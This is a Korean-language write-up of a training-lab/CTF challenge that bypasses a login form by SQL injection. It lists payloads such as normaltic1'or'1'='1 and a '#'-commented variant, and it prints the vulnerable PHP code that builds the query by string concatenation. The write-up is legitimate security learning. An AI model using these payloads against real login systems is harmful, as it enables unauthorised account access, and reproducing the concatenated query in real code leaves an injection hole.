[SegFault] (Authentication Bypass) - Login Bypass 1

[SegFault] Authentication Bypass (Login)

Login Bypass 1.

normaltic1 로 로그인하자!

 

문제 파악

• 위의 페이지에 접속하면 아래와 같은 화면이 나온다.
• 알고 있는 계정 :  [ID/PW] : doldol / dol1234

• Burp Suite을 이용하여 사이트 접속 과정의 상태코드(Status code) 확인한다.
  • 302 Found 
  • 200 OK

• 로그인 과정의 구조를 알기 위해, 알고 있는 정보로 로그인을 시도 해본다.
  • 302 Found
  • 200 OK

• 위의 두 history에 대한 요청(Request)을 살펴보자 !

• 요청(Requset)에서 POST 메서드를 이용하여 /login1/login.php 경로에 파라미터UserId=doldol&Password=dol1234&Submit=Login를 보내는 것을 확인 가능하다.
• login에 성공하여 index.php로 넘어가는 것을 확인할 수 있다.

---

생각 과정

생각 과정
1. SQL Injection이 가능한가?
-> doldol' and '1'='1 / dol1234 로 로그인이 가능하다면 SQL Injection이 동작했다는 것!
2. 어떤 로그인 로직으로 이루어져 있을까?
-> 우선적으로 식별/인증 동시를 생각
SELECT * FROM member WHERE UserId='___' and UserPw='___'; 
3. 인증/식별 동시의 경우 id에 접속하고자 하는 id + 'or'1'='1을 입력하여 참이되게 만들고, pw에는 아무거나 입력해서 거짓이 되게 해야함을 인식(SQL에서 연산의 우선순위가 or 보다 and가 먼저기 때문에 가능)
(결론 : id='normaltic1' or false가 되야함)
4. id : normaltic1'or'1'='1 / pw : 아무거나 시도

---

풀이 과정 (해결 방안)

 아이디(id)에는 normaltic1'or'1'='1를 대입하고, 비밀번호(pw)에는 아무거나 넣어주면 된다.

• 성공적으로 로그인 되어 Flag가 나옴
• 또 되는 것은 없을까? 고민
  • normaltic1'or'1'='1'#
  • (뒷 부분을 주석처리)

이것저것 테스트

ID : normaltic1' and '1' = '1' or '1' = '1
PW : dol1234
-> doldol로 로그인

ID : normaltic1' and '1' = '1' or '1' = '1
PW : 아무거나
-> normaltic1로 로그인

ID : normaltic' or '1'='1'#
PW : 아무거나
-> normaltic로 로그인

ID : normaltic' or '1'='1'#
PW : dol1234
-> doldol로 로그인

ID : 아무거나
PW : normaltic' or '1'='1'#
-> 전체 데이터 login_acc

ID: 아무거나
PW:dol1234' or '1'='1'#
-> 전체 데이터

해당 문제의 실제 코드

$sql = "SELECT * FROM member WHERE user_id='". $userid ."' and user_pass='". $userpass ."';";
$result = mysqli_query($db_conn, $sql);
$count = mysqli_num_rows($result);
$row = mysqli_fetch_array($result);
$username = $row['name'];
if($count > 0){
	return $username;
}else{
	return 0;
}

• 해당 문제를 보면 주석이 제대로 먹히지 않는 것을 알 수 있다.
• (위에서 볼 수 있듯, 식별인증 분리가 아니고, 필터링이 아닌 것을 볼 수 있다.)
• 주석이 먹히고 있지만 안먹히는 효과가 나는 것이다. 
  • id : normaltic1' or '1'='1'#
  • pw : dol1234
  • -> doldol로 로그인
  • 주석이 먹힌다면, 비밀번호 부분이 주석처리 되어 normaltic1으로 로그인 되어야 한다.
  • 비밀번호가 dol1234이라면 어떤 상황에도 doldol로 로그인되는 것을 볼 수 있다.

---

생각해볼 점

• 만약 ) id/pw 둘다 normaltic1'or'1'='1 이런식으로 만들어 주면 어떻게 될까?
• 참 or 참 이 되어 결론이 '참' 이므로 로그인 가능
• 하지만....!! 모든 것이 조회되어 login_acc가 나오게 됨
  • 전부 나오려면, 특정 값으로 참인 값이 아니고, 무조건 참인 명제여야 함

• normaltic, normaltic1~5가 들어가는 경우 해당으로 로그인되고 그 외에는 로그인 되지 않는다.
• 전체로 로그인 되고 나서 해당 아이디가 있는 경우에만 로그인 되기 때문이다.

---

 

질문 환영, 수정 및 보완에 대한 지적 환영